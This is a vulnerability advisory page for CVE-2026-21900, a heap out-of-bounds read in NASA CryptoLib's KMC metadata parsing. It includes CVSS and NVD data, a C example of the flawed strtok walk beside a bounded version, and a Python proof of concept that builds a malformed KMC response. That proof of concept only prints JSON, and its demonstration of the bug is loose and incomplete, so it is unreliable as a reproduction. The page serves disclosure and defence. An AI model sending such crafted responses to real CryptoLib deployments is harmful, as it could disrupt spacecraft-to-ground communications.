Security Vulnerability Report
CVE-2026-21900 CVSS 5.9 MEDIUM

CVE-2026-21900

Published: 2026-01-10 01:16:18
Last Modified: 2026-01-16 16:46:48

Description

CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, an out-of-bounds heap read vulnerability in cryptography_encrypt() occurs when parsing JSON metadata from KMC server responses. The flawed strtok iteration pattern uses ptr + strlen(ptr) + 1 which reads one byte past allocated buffer boundaries when processing short or malformed metadata strings. This issue has been patched in version 1.4.3.
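The iteration pattern named in the description, as an added example (not CryptoLib's source and not taken from the patch): the comma delimiter, the sample strings and both function names are assumptions. The flawed walk is modelled with offsets so the example itself never reads out of bounds, and it sits next to a walk that checks an explicit end pointer.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Flawed walk: after each strtok() token, step to tok + strlen(tok) + 1.
 * Modelled with offsets so this example never performs the bad read.
 * Returns the out-of-bounds offset the pattern would dereference next,
 * or 0 if the walk stays inside the allocation. */
size_t flawed_walk_oob_offset(const char *meta)
{
    size_t alloc = strlen(meta) + 1;       /* heap copy: text plus its NUL */
    char *buf = malloc(alloc);
    size_t oob = 0;
    if (buf == NULL)
        return 0;
    memcpy(buf, meta, alloc);
    for (char *tok = strtok(buf, ","); tok != NULL; tok = strtok(NULL, ",")) {
        size_t next = (size_t)(tok - buf) + strlen(tok) + 1;
        if (next >= alloc) {               /* buf[next] lies past the block */
            oob = next;
            break;
        }
    }
    free(buf);
    return oob;
}

/* Bounded walk: the cursor is compared with an explicit end pointer before
 * every access, and the input is never modified. Empty tokens are skipped. */
size_t count_tokens_bounded(const char *buf, size_t len, char delim)
{
    const char *p = buf, *end = buf + len;
    size_t n = 0;
    while (p < end) {
        const char *q = memchr(p, delim, (size_t)(end - p));
        if ((q ? q : end) > p)
            n++;
        p = q ? q + 1 : end;
    }
    return n;
}

int main(void)
{
    const char *samples[] = { "a:1,b:2", "A", "" };   /* constructed inputs */
    for (size_t i = 0; i < 3; i++)
        printf("\"%s\": alloc=%zu oob_offset=%zu tokens=%zu\n", samples[i],
               strlen(samples[i]) + 1, flawed_walk_oob_offset(samples[i]),
               count_tokens_bounded(samples[i], strlen(samples[i]), ','));
    return 0;
}
```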

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nasa:cryptolib:*:*:*:*:*:*:*:* - VULNERABLE
NASA CryptoLib < 1.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import base64
import json

# CVE-2026-21900 PoC - Simulated KMC Server Response
# This PoC demonstrates the malformed JSON metadata that triggers
# the out-of-bounds read in CryptoLib's cryptography_encrypt()


def generate_malicious_kmc_response():
    """
    Generate a malicious KMC server response that triggers the heap
    out-of-bounds read in CryptoLib. The vulnerability occurs when parsing
    JSON metadata with short strings that cause strtok iteration to read
    past the allocated buffer boundary.
    """
    # Malformed metadata with short strings
    # This triggers the vulnerable code path in cryptography_encrypt()
    malicious_metadata = {
        "key_id": "A",      # Short string - triggers OOB read
        "session_id": "B",  # Short string
        "algorithm": "C",   # Short string
        "iv": "D",          # Single character
        "auth_tag": "E",
    }
    # Craft the KMC response that CryptoLib will parse
    kmc_response = {
        "status": "success",
        "metadata": malicious_metadata,
        "encrypted_key": base64.b64encode(b'\x00' * 32).decode(),
    }
    return json.dumps(kmc_response)


def demonstrate_vulnerability():
    """
    Demonstration of the vulnerable strtok pattern:

    Original vulnerable code pattern:
        char *ptr = buffer;
        while ((token = strtok(ptr, delimiter)) != NULL) {
            process_token(token);
            ptr = NULL;  // For subsequent calls
            // Vulnerable: when processing short strings,
            // ptr + strlen(ptr) + 1 can exceed buffer bounds
        }
    """
    # Simulate the vulnerable iteration pattern
    metadata_str = 'A\0B\0C\0'  # Short null-terminated strings
    # This demonstrates how short strings lead to OOB read
    offset = 0  # Integer offset standing in for the C pointer `ptr`
    while offset < len(metadata_str) and metadata_str[offset] != '\0':
        token = metadata_str[offset:].split('\0')[0]
        token_length = len(token)
        # Vulnerable calculation: ptr + strlen(ptr) + 1
        next_offset = offset + token_length + 1
        # In real scenario, next_ptr may point past allocated buffer
        print(f"Token: {token}, Next ptr offset: {next_offset}")
        break  # Single iteration for demonstration


if __name__ == "__main__":
    print("CVE-2026-21900 PoC - NASA CryptoLib Heap OOB Read")
    print("=" * 50)
    response = generate_malicious_kmc_response()
    print(f"Malicious KMC Response: {response}")
    demonstrate_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21900", "sourceIdentifier": "[email protected]", "published": "2026-01-10T01:16:18.263", "lastModified": "2026-01-16T16:46:47.517", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, an out-of-bounds heap read vulnerability in cryptography_encrypt() occurs when parsing JSON metadata from KMC server responses. The flawed strtok iteration pattern uses ptr + strlen(ptr) + 1 which reads one byte past allocated buffer boundaries when processing short or malformed metadata strings. This issue has been patched in version 1.4.3."}, {"lang": "es", "value": "CryptoLib proporciona una solución únicamente de software utilizando el Protocolo de Seguridad de Enlace de Datos Espaciales CCSDS - Procedimientos Extendidos (SDLS-EP) para asegurar las comunicaciones entre una nave espacial que ejecuta el Sistema de Vuelo central (cFS) y una estación terrestre. Antes de la versión 1.4.3, una vulnerabilidad de lectura de pila fuera de límites en cryptography_encrypt() ocurre al analizar metadatos JSON de las respuestas del servidor KMC. El patrón de iteración defectuoso de strtok utiliza ptr + strlen(ptr) + 1, que lee un byte más allá de los límites del búfer asignado al procesar cadenas de metadatos cortas o malformadas. 
Este problema ha sido parcheado en la versión 1.4.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", 
"integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nasa:cryptolib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.3", "matchCriteriaId": "AE1BE91E-2901-42AF-BC66-762CFA7A2582"}]}]}], "references": [{"url": "https://github.com/nasa/CryptoLib/commit/2372efd3da1ccb226b4297222e25f41ecc84821d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nasa/CryptoLib/releases/tag/v1.4.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/nasa/CryptoLib/security/advisories/GHSA-4g6v-36fv-qcvw", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/nasa/CryptoLib/security/advisories/GHSA-4g6v-36fv-qcvw", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}